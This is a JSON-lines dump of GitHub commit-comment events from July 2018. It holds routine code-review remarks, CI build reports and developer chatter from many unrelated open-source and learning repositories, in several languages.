{"id":"7960641940","type":"CommitCommentEvent","actor":{"login":"StephanOsthold"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29696194,"position":34,"line":217,"path":"lib/Foswiki/Plugins/WorkflowAppPlugin.pm","commit_id":"768ea8e212a6cbc29348f07e7807eda492d7c8e3","created_at":"2018-07-13T08:02:02Z","updated_at":"2018-07-13T08:02:02Z","author_association":"CONTRIBUTOR","body":"Remove me"}},"created_at":"2018-07-13T08:02:02Z"}
{"id":"7960642653","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29696195,"position":null,"line":null,"path":null,"commit_id":"5cf9b2c72a73603cc7ecbecdda539c8df03142e4","created_at":"2018-07-13T08:02:13Z","updated_at":"2018-07-13T08:02:13Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2973 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T08:02:13Z"}
{"id":"7960645980","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29696202,"position":40,"line":91,"path":"modules/redisq/redisq.c","commit_id":"f270978d0a7b669f65eb7d3b91ec66cf2bd90c6f","created_at":"2018-07-13T08:02:59Z","updated_at":"2018-07-13T08:02:59Z","author_association":"MEMBER","body":"The `free` shall be called from the `release` queue, and not from `detach`."}},"created_at":"2018-07-13T08:02:59Z"}
{"id":"7960646346","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696205,"position":34,"line":34,"path":"lesson4/main.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:03:04Z","updated_at":"2018-07-13T08:03:04Z","author_association":"NONE","body":"все методы ниже метода menu, могут быть вызваны используя метод menu. Это значит, что они приватные"}},"created_at":"2018-07-13T08:03:04Z"}
{"id":"7960648706","type":"CommitCommentEvent","actor":{"login":"bencaowang"},"repo":{"name":"bencaowang/bcw-Repository"},"payload":{"comment":{"id":29696214,"position":null,"line":null,"path":null,"commit_id":"eabf0592614bbb6b965dcad454fbaf2b3d50b1bc","created_at":"2018-07-13T08:03:37Z","updated_at":"2018-07-13T08:03:37Z","author_association":"OWNER","body":"sfdaf"}},"created_at":"2018-07-13T08:03:37Z"}
{"id":"7960654296","type":"CommitCommentEvent","actor":{"login":"dynastykzhu"},"repo":{"name":"dynastykzhu/microservicecloud-config"},"payload":{"comment":{"id":29696221,"position":null,"line":null,"path":null,"commit_id":"cbeb702656a166760db54cde3580eb3141df761d","created_at":"2018-07-13T08:04:53Z","updated_at":"2018-07-13T08:04:53Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-13T08:04:53Z"}
{"id":"7960657130","type":"CommitCommentEvent","actor":{"login":"candirufish"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29696231,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T08:05:31Z","updated_at":"2018-07-13T08:05:31Z","author_association":"OWNER","body":"@Vizvezdenec No, I think I reached the limit of the fishtest framework. It frequently crashes at 2 million already. Maybe when the framework is more robust or when we break the 10000 cores barrier on fishtest. ( ͡° ͜ʖ ͡°)"}},"created_at":"2018-07-13T08:05:31Z"}
{"id":"7960657890","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29696233,"position":18,"line":18,"path":"StudentIQTest-annotations/src/main/java/ru/otus/elena/studentiqtest/iqtest/IQTestImpl.java","commit_id":"11568eea010109b91fc9d7179a60b9f837ea7e8b","created_at":"2018-07-13T08:05:40Z","updated_at":"2018-07-13T08:05:40Z","author_association":"NONE","body":"ТОлько private, и лучше черезх аргумент конструктора вставлять"}},"created_at":"2018-07-13T08:05:40Z"}
{"id":"7960658800","type":"CommitCommentEvent","actor":{"login":"gibsson"},"repo":{"name":"boundarydevices/meta-freescale-3rdparty"},"payload":{"comment":{"id":29696235,"position":9,"line":34,"path":"conf/machine/nitrogen8m.conf","commit_id":"f3813f0454c62c6afb05eccfb0c8f7ee7828849e","created_at":"2018-07-13T08:05:52Z","updated_at":"2018-07-13T08:05:52Z","author_association":"MEMBER","body":"That's super strange, if definitely worked for me without that change:\r\n$ ls -l /media/gbisson/boot/\r\ntotal 18960\r\n-rw-r--r-- 1 gbisson gbisson     4196 Jul 11 14:45 boot.scr\r\n-rw-r--r-- 1 gbisson gbisson 19309056 Jul 11 14:45 Image\r\n-rw-r--r-- 1 gbisson gbisson    47427 Jul 11 14:45 imx8mq-nitrogen8m.dtb\r\n-rw-r--r-- 1 gbisson gbisson    47545 Jul 11 14:45 imx8mq-nitrogen8m-m4.dtb"}},"created_at":"2018-07-13T08:05:52Z"}
{"id":"7960660189","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29696241,"position":null,"line":null,"path":null,"commit_id":"4682a775ee8f443eb151744ad2b097910a5daced","created_at":"2018-07-13T08:06:11Z","updated_at":"2018-07-13T08:06:11Z","author_association":"NONE","body":"$!ban despacito"}},"created_at":"2018-07-13T08:06:11Z"}
{"id":"7960663293","type":"CommitCommentEvent","actor":{"login":"StephanOsthold"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29696244,"position":38,"line":221,"path":"lib/Foswiki/Plugins/WorkflowAppPlugin.pm","commit_id":"768ea8e212a6cbc29348f07e7807eda492d7c8e3","created_at":"2018-07-13T08:06:50Z","updated_at":"2018-07-13T08:06:50Z","author_association":"CONTRIBUTOR","body":"Den namen \"isnotsaved\" finde ich noch nicht ganz ideal, schließlich ist ein topic, welches man gerade bearbeitet auch nicht gesaved."}},"created_at":"2018-07-13T08:06:50Z"}
{"id":"7960664118","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29696246,"position":36,"line":84,"path":"android/src/com/frostwire/android/offers/PrebidManager.java","commit_id":"0720540bc79dc52b1629ea51b899bd752ea10017","created_at":"2018-07-13T08:07:02Z","updated_at":"2018-07-13T08:07:02Z","author_association":"COLLABORATOR","body":":+1\r\n"}},"created_at":"2018-07-13T08:07:02Z"}
{"id":"7960665607","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29696249,"position":null,"line":null,"path":null,"commit_id":"5cf9b2c72a73603cc7ecbecdda539c8df03142e4","created_at":"2018-07-13T08:07:22Z","updated_at":"2018-07-13T08:07:22Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T08:07:22Z"}
{"id":"7960667298","type":"CommitCommentEvent","actor":{"login":"shadowcz007"},"repo":{"name":"shadowcz007/mixNameCard"},"payload":{"comment":{"id":29696250,"position":null,"line":null,"path":null,"commit_id":"2bc165d17ce9349afdee9ee18b65519db325753b","created_at":"2018-07-13T08:07:45Z","updated_at":"2018-07-13T08:07:45Z","author_association":"OWNER","body":"update\r\n"}},"created_at":"2018-07-13T08:07:45Z"}
{"id":"7960667329","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29696251,"position":36,"line":84,"path":"android/src/com/frostwire/android/offers/PrebidManager.java","commit_id":"0720540bc79dc52b1629ea51b899bd752ea10017","created_at":"2018-07-13T08:07:45Z","updated_at":"2018-07-13T08:07:45Z","author_association":"COLLABORATOR","body":"cool, now I get what you did reading this line."}},"created_at":"2018-07-13T08:07:45Z"}
{"id":"7960668568","type":"CommitCommentEvent","actor":{"login":"YaLTeR"},"repo":{"name":"YaLTeR/hlkreedz"},"payload":{"comment":{"id":29696252,"position":4,"line":23,"path":"scripting/hl_kreedz.sma","commit_id":"1d3eb5ae3555674497e95f377e3ce0cd3ee5c338","created_at":"2018-07-13T08:08:01Z","updated_at":"2018-07-13T08:08:01Z","author_association":"OWNER","body":"nice"}},"created_at":"2018-07-13T08:08:01Z"}
{"id":"7960672930","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29696261,"position":16,"line":16,"path":"StudentIQTest-annotations/src/main/java/ru/otus/elena/studentiqtest/testresult/TestResultImpl.java","commit_id":"11568eea010109b91fc9d7179a60b9f837ea7e8b","created_at":"2018-07-13T08:08:58Z","updated_at":"2018-07-13T08:08:58Z","author_association":"NONE","body":"Я бы это Map-ой сделал бы))"}},"created_at":"2018-07-13T08:08:58Z"}
{"id":"7960673161","type":"CommitCommentEvent","actor":{"login":"mariogamer2"},"repo":{"name":"mariogamer2/Atmosphere"},"payload":{"comment":{"id":29696263,"position":null,"line":null,"path":null,"commit_id":"7b4aef64ec68715271d17a69063f85fa5f22ba25","created_at":"2018-07-13T08:09:01Z","updated_at":"2018-07-13T08:09:01Z","author_association":"OWNER","body":"*R"}},"created_at":"2018-07-13T08:09:01Z"}
{"id":"7960674128","type":"CommitCommentEvent","actor":{"login":"jasonyu1996"},"repo":{"name":"char-fish-after-lunch/SystemOnCat"},"payload":{"comment":{"id":29696265,"position":null,"line":null,"path":null,"commit_id":"c6ab2b87319889eb725934388032c5ce2b188655","created_at":"2018-07-13T08:09:15Z","updated_at":"2018-07-13T08:09:15Z","author_association":"CONTRIBUTOR","body":"Commit message fix: 4 byte -> 15 byte"}},"created_at":"2018-07-13T08:09:15Z"}
{"id":"7960674972","type":"CommitCommentEvent","actor":{"login":"MartinNyowani"},"repo":{"name":"MartinNyowani/Zamriddimz"},"payload":{"comment":{"id":29696267,"position":null,"line":null,"path":null,"commit_id":"5ad52caab7288c24d9d1f5577801101c2abae2ce","created_at":"2018-07-13T08:09:26Z","updated_at":"2018-07-13T08:09:26Z","author_association":"OWNER","body":"![wall paper copy](https://user-images.githubusercontent.com/41182980/42680258-cd063e94-8684-11e8-9068-c933455ed1f4.jpg)\r\n"}},"created_at":"2018-07-13T08:09:26Z"}
{"id":"7960676917","type":"CommitCommentEvent","actor":{"login":"gchenyingying"},"repo":{"name":"gchenyingying/css"},"payload":{"comment":{"id":29696269,"position":null,"line":null,"path":null,"commit_id":"51f290a449e8d757fbd33db7c2712ddac24e1433","created_at":"2018-07-13T08:09:52Z","updated_at":"2018-07-13T08:09:52Z","author_association":"OWNER","body":"测试中"}},"created_at":"2018-07-13T08:09:52Z"}
{"id":"7960677686","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696271,"position":159,"line":159,"path":"lesson4/main.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:10:03Z","updated_at":"2018-07-13T08:10:03Z","author_association":"NONE","body":"Пока я просто теоретический предполагаю, как программа должна работать. Потому-что вот результат запуска main.rb\r\n```\r\n:lesson4$ ruby main.rb\r\nПривет, это программа - абстракция железной дороги\r\n:lesson4$\r\n```\r\n"}},"created_at":"2018-07-13T08:10:03Z"}
{"id":"7960682433","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696275,"position":159,"line":159,"path":"lesson4/main.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:11:06Z","updated_at":"2018-07-13T08:11:06Z","author_association":"NONE","body":"В Railroad нужен метод, который будет запускать программу и выводить пользователю меню."}},"created_at":"2018-07-13T08:11:06Z"}
{"id":"7960686559","type":"CommitCommentEvent","actor":{"login":"beauroberts"},"repo":{"name":"Autodesk/hig"},"payload":{"comment":{"id":29696280,"position":23,"line":23,"path":"packages/theme-data/src/utils/resolveTheme.test.js","commit_id":"e499e631693a6b479f98feb85967780797c3e21c","created_at":"2018-07-13T08:12:01Z","updated_at":"2018-07-13T08:12:01Z","author_association":"MEMBER","body":"🎊 "}},"created_at":"2018-07-13T08:12:01Z"}
{"id":"7960686983","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696281,"position":9,"line":9,"path":"lesson4/passengerTrain.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:12:08Z","updated_at":"2018-07-13T08:12:08Z","author_association":"NONE","body":"смотри коменты к КаргоТрэйн"}},"created_at":"2018-07-13T08:12:08Z"}
{"id":"7960687137","type":"CommitCommentEvent","actor":{"login":"wdoekes"},"repo":{"name":"SIPp/sipp"},"payload":{"comment":{"id":29696283,"position":null,"line":null,"path":null,"commit_id":"1a98eb190c12304a77d30001609d13df5f372727","created_at":"2018-07-13T08:12:10Z","updated_at":"2018-07-13T08:12:10Z","author_association":"MEMBER","body":"For reference:\r\n\r\nAfter the fix:\r\n```\r\n$ ./sipp -m 1 -t t1 google.com:80\r\n...\r\n2018-07-13\t10:10:35.345461\t1531469435.345461: non SIP message discarded: \"HTTP/1.0 400 Bad Request\r\nContent-Type: text/html; charset=UTF-8\r\nReferrer-Policy: no-referrer\r\nContent-Length: 1555\r\nDate: Fri, 13 Jul 2018 08:10:35 GMT\r\n\r\n<!DOCTYPE html>\r\n...\r\n```\r\n\r\nBefore the fix:\r\n```\r\n$ ./sipp -m 1 -t t1 google.com:80\r\n...\r\n2018-07-13\t10:11:42.715444\t1531469502.715444: Failed to delete FD from epoll, errno = 9 (Bad file descriptor).\r\nsipp: There were more errors, enable -trace_err to log them.\r\n```"}},"created_at":"2018-07-13T08:12:10Z"}
{"id":"7960688512","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696284,"position":4,"line":4,"path":"lesson4/passengerWagon.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:12:28Z","updated_at":"2018-07-13T08:12:28Z","author_association":"NONE","body":"смотри коменты к CargoWagon"}},"created_at":"2018-07-13T08:12:28Z"}
{"id":"7960690868","type":"CommitCommentEvent","actor":{"login":"kenpower"},"repo":{"name":"saljuama/java-8-vavr-functional"},"payload":{"comment":{"id":29696289,"position":70,"line":70,"path":"src/test/java/com/saljuama/javafunctional/highorderfunctions/adts/sum/OptionHighOrderApiTest.java","commit_id":"b96d69719b227ac1552df006abcdf295728055a2","created_at":"2018-07-13T08:13:02Z","updated_at":"2018-07-13T08:13:02Z","author_association":"NONE","body":"can you show how it would be done usually?\r\n"}},"created_at":"2018-07-13T08:13:02Z"}
{"id":"7960691323","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696290,"position":15,"line":15,"path":"lesson4/train.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:13:09Z","updated_at":"2018-07-13T08:13:09Z","author_association":"NONE","body":"Здесь должна быть общая логика по добавлению вагонов"}},"created_at":"2018-07-13T08:13:09Z"}
{"id":"7960691766","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29696291,"position":13,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"de20f7fd336b7e10cf3ad7361179f367cc905fc0","created_at":"2018-07-13T08:13:14Z","updated_at":"2018-07-13T08:13:14Z","author_association":"NONE","body":"Поле ```myOut``` вряд ли будет строковым, т.к. у строки нет метода```myPrintln()```, а по коду должен быть. Так что это должно быть поле какого-то своего типа, у которого мы создадим такой метод.\r\n\r\n> возвращается аргумент \"Hello World\"<...> проблема с вызовом этого аргумента в main()\r\n \r\nЗдесь давай уточним терминологию:\r\n- _возвращается аргумент_ - \"возвращяется\" обычно говорят про значение, которое возвращается из метода с помощью конструкции ```return```. Это, видимо, не наш случай, поэтому уточни, пожалуйста, что имелось в виду\r\n- _проблема с вызовом этого аргумента в main()_ - \"вызов\" говорят про методы, например: _вызов метода из main()_. Возможно, под \"аргументом\" ты имеешь в виду член класса: поле или метод. В таком случае, если ты имеешь в виду то, что  после точки после ```myOut``` не получается указать ```myPrintln()```, то это из-за того, что ты пытался сделать ```myOut``` строковым, как я писал выше. \r\n\r\nВ любом случае, аргумент - это не член класса, это то, что передаётся в скобках при вызове метода. Схема получается такая: ```Класс.поле.метод(аргумент);```"}},"created_at":"2018-07-13T08:13:14Z"}
{"id":"7960695459","type":"CommitCommentEvent","actor":{"login":"You-Ay"},"repo":{"name":"You-Ay/vectors"},"payload":{"comment":{"id":29696299,"position":null,"line":null,"path":null,"commit_id":"6f54be1e165e06399ccde9f2c963d6da7ba36a81","created_at":"2018-07-13T08:14:03Z","updated_at":"2018-07-13T08:14:03Z","author_association":"OWNER","body":"Tested and verified functionality. Works like a charm!"}},"created_at":"2018-07-13T08:14:03Z"}
{"id":"7960700885","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696306,"position":6,"line":6,"path":"lesson4/route.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:15:17Z","updated_at":"2018-07-13T08:15:17Z","author_association":"NONE","body":"Ну нужно делать инстэнс переменные из того, что можно вычислить из других инстэнс переменных. Сделай отдельные методы для start_station и end_station"}},"created_at":"2018-07-13T08:15:17Z"}
{"id":"7960705113","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696323,"position":15,"line":15,"path":"lesson4/route.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:16:15Z","updated_at":"2018-07-13T08:16:15Z","author_association":"NONE","body":"будет работать и без self. Ты ведь не перезаписываешь значение."}},"created_at":"2018-07-13T08:16:15Z"}
{"id":"7960705660","type":"CommitCommentEvent","actor":{"login":"piertf14"},"repo":{"name":"piertf14/suli-api"},"payload":{"comment":{"id":29696329,"position":null,"line":null,"path":null,"commit_id":"f6e7500314f9b306bc996cc724c7444f0ee066bc","created_at":"2018-07-13T08:16:23Z","updated_at":"2018-07-13T08:16:23Z","author_association":"OWNER","body":"xd"}},"created_at":"2018-07-13T08:16:23Z"}
{"id":"7960717453","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696343,"position":2,"line":2,"path":"lesson4/train.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:18:49Z","updated_at":"2018-07-13T08:18:49Z","author_association":"NONE","body":":count_wagons больше не используется"}},"created_at":"2018-07-13T08:18:49Z"}
{"id":"7960719913","type":"CommitCommentEvent","actor":{"login":"acotiuga"},"repo":{"name":"xwiki-contrib/macro-map"},"payload":{"comment":{"id":29696349,"position":6,"line":276,"path":"src/main/resources/XWiki/MapMacro.xml","commit_id":"7d40e6e6fdaa01c378d38c612d1bb8400519f272","created_at":"2018-07-13T08:19:20Z","updated_at":"2018-07-13T08:19:20Z","author_association":"CONTRIBUTOR","body":"Here's a change that was wrongly applied. You added a line but you didn't removed the old one (the one above)."}},"created_at":"2018-07-13T08:19:20Z"}
{"id":"7960721845","type":"CommitCommentEvent","actor":{"login":"honggyukim"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29696353,"position":67,"line":133,"path":"INSTALL.md","commit_id":"dd562e7f0bf68780754121d6a63dae792158c091","created_at":"2018-07-13T08:19:45Z","updated_at":"2018-07-13T08:19:45Z","author_association":"COLLABORATOR","body":"I think it should also be change as follows:\r\n\r\n\"to download and build libelf, which is one of the libraries in elfutils.\" => \"to download and build libelf/libdw, which are the libraries in elfutils.\""}},"created_at":"2018-07-13T08:19:45Z"}
{"id":"7960724848","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29696358,"position":null,"line":null,"path":null,"commit_id":"9ccb5df49f8e093bc55e566f3abd3308a011f174","created_at":"2018-07-13T08:20:24Z","updated_at":"2018-07-13T08:20:24Z","author_association":"NONE","body":"Please always submit LTC tests of speculative nature with lowered throughput, thanks ;-)"}},"created_at":"2018-07-13T08:20:24Z"}
{"id":"7960729448","type":"CommitCommentEvent","actor":{"login":"xxholly32"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29696367,"position":null,"line":null,"path":null,"commit_id":"a524e18374e3fb263a24c999ddf8b704d34fabc2","created_at":"2018-07-13T08:21:24Z","updated_at":"2018-07-13T08:21:24Z","author_association":"NONE","body":"@huan713 @zimplexing @ziyi2 请审核"}},"created_at":"2018-07-13T08:21:24Z"}
{"id":"7960730487","type":"CommitCommentEvent","actor":{"login":"gurkaynak"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29696372,"position":54,"line":93,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T08:21:37Z","updated_at":"2018-07-13T08:21:37Z","author_association":"NONE","body":"Hello guys,\n\nas mentioned earlier, Google is working towards releasing a style guide \nand I am currently trying to give some feedback (Florian is also \ncontributing) to that. I am in discussions to allow a broader \nparticipation. Regarding this issue, currently this is what stands \nthere:\n\n“Use begin and end unless the whole statement fits on a single line.\nIf a statement wraps at a block boundary, it must use begin and end. \nOnly if a whole semicolon-terminated statement fits on a single line can \nbegin and end be omitted.\n\nbegin must be on the same line as the preceding keyword, and ends the \nline. end must start a new line. end else begin must be together on one \nline. The only exception is if end has a label, a following else should \nbe on a new line.”\n\nThings such as these (also prefix/suffix, camel not camel, 2/4 space \nindent) which do not have tangible technical implications but boil down \nto more or less personal preferences will most probably end up the way \nhow Google currently prefers to have it.\n\nAs things stand, I can not share the document with you directly, but \nFlorian could perhaps adjust our style guide to match them more closely \nthan it is now\n\nCheers,\nKGF\n\n\n\nOn 13 Jul 2018, at 9:26, Andreas Kurth wrote:\n\n> I see @FrancescoConti's point, but think that identifying a line \n> starting with `end else` as `else` clause is just slightly more \n> difficult for the brain than a line starting with only `else`. \n> Therefore, I prefer @zarubaf's more uniform approach and agree on \n> dropping the variant.\n>\n> -- \n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/pulp-platform/style-guidelines/commit/19f16281a889ebeffdfd4aea381a6026408c3d2a#commitcomment-29695844\n"}},"created_at":"2018-07-13T08:21:37Z"}
{"id":"7960732558","type":"CommitCommentEvent","actor":{"login":"mesutto"},"repo":{"name":"furkankarakaya/GaN-Studies"},"payload":{"comment":{"id":29696375,"position":null,"line":null,"path":null,"commit_id":"4532c01e53f1d510f044c77d8c35b5339fd4f4a9","created_at":"2018-07-13T08:22:04Z","updated_at":"2018-07-13T08:22:04Z","author_association":"COLLABORATOR","body":"Eline sağlık. Bu ortak GaN çalışmalarının reposu sanırım? Hüseyin'in de olacağı?"}},"created_at":"2018-07-13T08:22:04Z"}
{"id":"7960743506","type":"CommitCommentEvent","actor":{"login":"vladsaveliev"},"repo":{"name":"bcbio/bcbio-nextgen"},"payload":{"comment":{"id":29696416,"position":null,"line":null,"path":null,"commit_id":"08bb552975e51f7e176b44e0ad30513b1b677c37","created_at":"2018-07-13T08:24:29Z","updated_at":"2018-07-13T08:24:29Z","author_association":"CONTRIBUTOR","body":"Hi Brad, \r\n\r\nAfter this commit `_merge_target_information` is not called anymore, so the section about the used BED files does not show up in the bcbio header. Just checking if that was removed on purpose by any chance?"}},"created_at":"2018-07-13T08:24:29Z"}
{"id":"7960745270","type":"CommitCommentEvent","actor":{"login":"piskvorky"},"repo":{"name":"RaRe-Technologies/gensim"},"payload":{"comment":{"id":29696421,"position":180,"line":143,"path":"gensim/models/keyedvectors.py","commit_id":"90c22fdbeeef11cb4cd2929053eee0ca0c409ba1","created_at":"2018-07-13T08:24:52Z","updated_at":"2018-07-13T08:24:52Z","author_association":"MEMBER","body":"I don't think so. Let's continue the discussion some other way though, it's impossible to find comments in this already-merged mega-commit."}},"created_at":"2018-07-13T08:24:52Z"}
{"id":"7960764032","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29696455,"position":80,"line":80,"path":"modules/redisq/redisq-grammar.ym","commit_id":"00dcd230012c8349da01133c324d5ffdbcb979c1","created_at":"2018-07-13T08:28:57Z","updated_at":"2018-07-13T08:28:57Z","author_association":"MEMBER","body":"This function is empty, and does nothing, it is better to remove it."}},"created_at":"2018-07-13T08:28:57Z"}
{"id":"7960770427","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29696469,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-13T08:30:21Z","updated_at":"2018-07-13T08:30:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T08:30:21Z"}
{"id":"7960771463","type":"CommitCommentEvent","actor":{"login":"mesutto"},"repo":{"name":"furkankarakaya/GaN-Studies"},"payload":{"comment":{"id":29696470,"position":null,"line":null,"path":null,"commit_id":"4532c01e53f1d510f044c77d8c35b5339fd4f4a9","created_at":"2018-07-13T08:30:33Z","updated_at":"2018-07-13T08:30:33Z","author_association":"COLLABORATOR","body":"Bu akşam (müsait olursan) ve yarın üzerinden beraber de geçeriz. Benim de bir iki fikrim vardı."}},"created_at":"2018-07-13T08:30:33Z"}
{"id":"7960774022","type":"CommitCommentEvent","actor":{"login":"vikaschoudhary16"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29696473,"position":54,"line":292,"path":"keps/sig-node/00014-resource-api.md","commit_id":"356acebf1b4e196fa5fff47bb7e7e523e70eaea5","created_at":"2018-07-13T08:31:05Z","updated_at":"2018-07-13T08:31:05Z","author_association":"NONE","body":"We discussed that scheduler will resolve only compute resource name from resource class and will record the count of the compute resource required. Actual deviceIds will be allocated by kubelet. We decided this to deviate less from current flow of scheduler and kubelet.\r\n\r\nBut here it seems scheduler is deciding device Uids because `count` field is not there. ?"}},"created_at":"2018-07-13T08:31:05Z"}
{"id":"7960778759","type":"CommitCommentEvent","actor":{"login":"furkankarakaya"},"repo":{"name":"furkankarakaya/GaN-Studies"},"payload":{"comment":{"id":29696482,"position":null,"line":null,"path":null,"commit_id":"4532c01e53f1d510f044c77d8c35b5339fd4f4a9","created_at":"2018-07-13T08:32:07Z","updated_at":"2018-07-13T08:32:07Z","author_association":"OWNER","body":"İyi olur, konuşalım 👍 "}},"created_at":"2018-07-13T08:32:07Z"}
{"id":"7960778896","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696483,"position":42,"line":42,"path":"lesson4/train.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:32:09Z","updated_at":"2018-07-13T08:32:09Z","author_association":"NONE","body":"Я помню, как оставлял комент, удалить это. Пройдись пожалуйста по коментам прошлого урока и убедись, что все исправлено."}},"created_at":"2018-07-13T08:32:09Z"}
